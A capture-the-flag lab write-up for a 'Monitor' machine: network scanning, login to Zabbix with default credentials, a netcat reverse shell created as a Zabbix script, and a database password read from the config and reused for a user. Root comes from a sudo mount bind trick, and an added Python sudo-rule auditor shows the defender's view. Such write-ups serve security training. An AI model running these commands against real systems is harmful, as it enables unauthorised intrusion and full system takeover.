Information gathering

cmd
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.92   08:00:27:1d:29:60       PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.31.92
cmd
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-10 08:34 EDT
Nmap scan report for Monitor (192.168.31.92)
Host is up (0.00059s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: \xE7\x9B\x91\xE6\x8E\xA7\xE7\xB3\xBB\xE7\xBB\x9F\xE7\x99\xBB\xE5\xBD\x95
|_http-server-header: Apache/2.4.62 (Debian)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      36034/udp6  mountd
|   100005  1,2,3      38236/udp   mountd
|   100005  1,2,3      38947/tcp6  mountd
|   100005  1,2,3      41683/tcp   mountd
|   100021  1,3,4      32829/tcp6  nlockmgr
|   100021  1,3,4      33419/tcp   nlockmgr
|   100021  1,3,4      41563/udp   nlockmgr
|   100021  1,3,4      60724/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs     3-4 (RPC #100003)
MAC Address: 08:00:27:1D:29:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms Monitor (192.168.31.92)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds

Directory scanning

cmd
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.92
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,bk,bak,tar,php3,zip,gz,shtml,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.php            (Status: 200) [Size: 1841]
/upload               (Status: 301) [Size: 315] [--> http://192.168.31.92/upload/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/dashboard.php        (Status: 302) [Size: 0] [--> index.php]
/zabbix               (Status: 301) [Size: 315] [--> http://192.168.31.92/zabbix/]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

Opened the site directly and tried to log in; a casual attempt with the weak password admin/admin got in, but there was nothing useful there.

The scan turned up /zabbix; a quick search showed that the default credentials are Admin/zabbix.

Administration - Scripts: create a script

[Screenshot: PenTest_MazeSec_Monitor-1]

text
nc 192.168.31.58 23333 -e /bin/sh

Listen on Kali

text
nc -lvp 23333

Monitoring - Hosts: run the script to get a reverse shell

[Screenshot: PenTest_MazeSec_Monitor-2]

The user flag is in /home/hyh/user.txt

[Screenshot: PenTest_MazeSec_Monitor-3]

flag
flag{user-ab0e0561b1a833a6141ad2273744543c}

Privilege escalation

The netcat shell in use right now is non-interactive and awkward to work with, so the first step is to stabilize the shell.

Run the following in order:

cmd
script /dev/null -c bash
Ctrl + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash

Look at the Zabbix web frontend configuration file

cmd
zabbix@Monitor:/$ find / -name 'zabbix.conf.php' 2>/dev/null
/usr/share/zabbix/conf/zabbix.conf.php
/etc/zabbix/web/zabbix.conf.php
zabbix@Monitor:/$ cat /usr/share/zabbix/conf/zabbix.conf.php
<?php
// Zabbix GUI configuration file.

$DB['TYPE']             = 'MYSQL';
$DB['SERVER']           = 'localhost';
$DB['PORT']             = '0';
$DB['DATABASE']         = 'zabbix';
$DB['USER']             = 'zabbix';
$DB['PASSWORD']         = 'root123';

// Schema name. Used for PostgreSQL.
$DB['SCHEMA']           = '';

// Used for TLS connection.
$DB['ENCRYPTION']       = false;
$DB['KEY_FILE']         = '';
$DB['CERT_FILE']        = '';
$DB['CA_FILE']          = '';
$DB['VERIFY_HOST']      = false;
$DB['CIPHER_LIST']      = '';

// Vault configuration. Used if database credentials are stored in Vault secrets manager.
$DB['VAULT_URL']        = '';
$DB['VAULT_DB_PATH']    = '';
$DB['VAULT_TOKEN']      = '';

// Use IEEE754 compatible value range for 64-bit Numeric (float) history values.
// This option is enabled by default for new Zabbix installations.
// For upgraded installations, please read database upgrade notes before enabling this option.
$DB['DOUBLE_IEEE754']   = true;

// Uncomment and set to desired values to override Zabbix hostname/IP and port.
// $ZBX_SERVER          = '';
// $ZBX_SERVER_PORT     = '';

$ZBX_SERVER_NAME        = 'Zabbix';

$IMAGE_FORMAT_DEFAULT   = IMAGE_FORMAT_PNG;

// Uncomment this block only if you are using Elasticsearch.
// Elasticsearch url (can be string if same url is used for all types).
//$HISTORY['url'] = [
//      'uint' => 'http://localhost:9200',
//      'text' => 'http://localhost:9200'
//];
// Value types stored in Elasticsearch.
//$HISTORY['types'] = ['uint', 'text'];

// Used for SAML authentication.
// Uncomment to override the default paths to SP private key, SP and IdP X.509 certificates, and to set extra settings.
//$SSO['SP_KEY']        = 'conf/certs/sp.key';
//$SSO['SP_CERT']       = 'conf/certs/sp.crt';
//$SSO['IDP_CERT']      = 'conf/certs/idp.crt';
//$SSO['SETTINGS']      = [];

The database password is root123. There is a directory named hyh under /home, so try logging in as user hyh with the same password (credential reuse).

cmd
zabbix@Monitor:/$ ls /home
hyh
zabbix@Monitor:/$ su hyh
Password: 
hyh@Monitor:/$ id
uid=1000(hyh) gid=1000(hyh) groups=1000(hyh)

Check sudo privileges

cmd
hyh@Monitor:/$ sudo -l
Matching Defaults entries for hyh on Monitor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hyh may run the following commands on Monitor:
    (ALL) NOPASSWD: /usr/bin/mount
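From the defender's side, the misconfiguration that decides this box is the `(ALL) NOPASSWD: /usr/bin/mount` rule: mount run as root can bind-mount any file over a privileged path. The following audit helper is an added example, not part of the original writeup; it parses `sudo -l` output (the sample below is constructed from the rule shown above plus one harmless rule for contrast) and flags NOPASSWD rules for binaries that can rewrite or overlay the filesystem.

```python
import re

# Constructed sample: the rule from this writeup plus one benign rule (not live data).
SAMPLE_SUDO_L = """\
Matching Defaults entries for hyh on Monitor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User hyh may run the following commands on Monitor:
    (ALL) NOPASSWD: /usr/bin/mount
    (root) /usr/bin/systemctl restart zabbix-server
"""

# Binaries that, run as root, let the caller replace or overlay other files
# (mount can bind-mount an arbitrary file over a privileged path, as seen above).
FILESYSTEM_ALTERING = {"mount", "umount", "chown", "chmod", "cp", "dd", "tee"}

# One sudoers rule line: "(runas) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) tuples from `sudo -l` output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything before this is the Defaults section
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def risky_rules(text):
    """Flag filesystem-altering binaries runnable as root without a password."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if runas in ("ALL", "root") and nopasswd and binary in FILESYSTEM_ALTERING:
            findings.append(f"{binary} runnable as root with NOPASSWD: {cmd}")
    return findings
```

The fix on the host side is to drop the NOPASSWD tag and restrict the rule to the exact mount invocation the user needs (source, target and options spelled out), or to move the task into a systemd unit the user may start instead.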

Escalate privileges via mount

cmd
hyh@Monitor:/$ sudo mount -o bind /bin/sh /bin/mount
hyh@Monitor:/$ sudo mount
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
flag{root-deb15d884e04de6f6972b3c25e3cc11b}
text
flag{root-deb15d884e04de6f6972b3c25e3cc11b}